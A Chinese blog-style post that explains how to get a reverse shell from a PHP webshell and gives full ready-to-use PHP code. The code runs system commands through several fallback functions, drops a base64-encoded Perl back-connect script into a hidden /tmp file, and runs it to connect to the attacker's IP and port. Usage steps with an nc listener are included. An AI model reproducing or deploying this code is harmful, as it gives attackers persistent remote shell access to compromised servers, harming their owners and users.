PHP Webshell 下的端口反弹方法
程序员文章站
2022-07-03 10:05:24
phpspy2011 中的 Back Connect 怎么弄都不能反弹回来,在网上找了段代码,测试成功了,但自己看了下,这段代码貌似也是从 phpspy 中分离出来的... 11-11-11...
使用方法:需要将以下代码保存为一个单独的php文件。上传到服务器之后,本地nc监听一个端口,在代码里设置好反弹ip和端口,然后直接访问上传的php文件,就会给 nc 弹回来一个shell。
测试实例:先在本地执行 nc -vv -l -p port,然后访问这个php页面 http://www.site.com/phpdkft.php ,本地就会得到一个反弹的shell。
这样每次可以直接访问这个php页面,直接弹回来shell,不用做其他繁琐的操作,下面贴出来已经修改好的代码
复制代码
代码如下:<?php
function which($pr) {
$path = execute("which $pr");
return ($path ? $path : $pr);
}
function execute($cfe) {
$res = '';
if ($cfe) {
if(function_exists('exec')) {
@exec($cfe,$res);
$res = join("\n",$res);
} elseif(function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = '';
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname,$text){
if($fp=@fopen($fname,'w')) {
@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}
$yourip = "your ip";
$yourport = 'your port';
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="iyevdxnyl2jpbi9wzxjsdqp1c2ugu29ja2v0ow0kjgntzd0gimx5bngiow0kjhn5c3rlbt0gj2vjag8gimb1bmftzsatywaio2vj".
"ag8gimbpzgaioy9iaw4vc2gnow0kjda9jgntzdsncir0yxjnzxq9jefsr1zbmf07dqokcg9ydd0kqvjhvlsxxtsncirpywrkcj1pbmv0x2f0b24ojhr".
"hcmdldckgfhwgzgllkcjfcnjvcjogjcfcbiipow0kjhbhzgrypxnvy2thzgryx2lukcrwb3j0lcakawfkzhipihx8igrpzsgirxjyb3i6icqhxg4ikt".
"sncirwcm90bz1nzxrwcm90b2j5bmftzsgndgnwjyk7dqpzb2nrzxqou09ds0vulcbqrl9jtkvulcbtt0nlx1nuukvbtswgjhbyb3rvksb8fcbkawuoi".
"kvycm9yoiakivxuiik7dqpjb25uzwn0kfnpq0tfvcwgjhbhzgryksb8fcbkawuoikvycm9yoiakivxuiik7dqpvcgvukfnurelolcaipiztt0nlrvqi".
"ktsncm9wzw4ou1ret1vulcaipiztt0nlrvqiktsncm9wzw4ou1rervjslcaipiztt0nlrvqiktsncnn5c3rlbsgkc3lzdgvtktsncmnsb3nlkfnurel".
"oktsncmnsb3nlkfnure9vvck7dqpjbg9zzshtverfulipow==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?>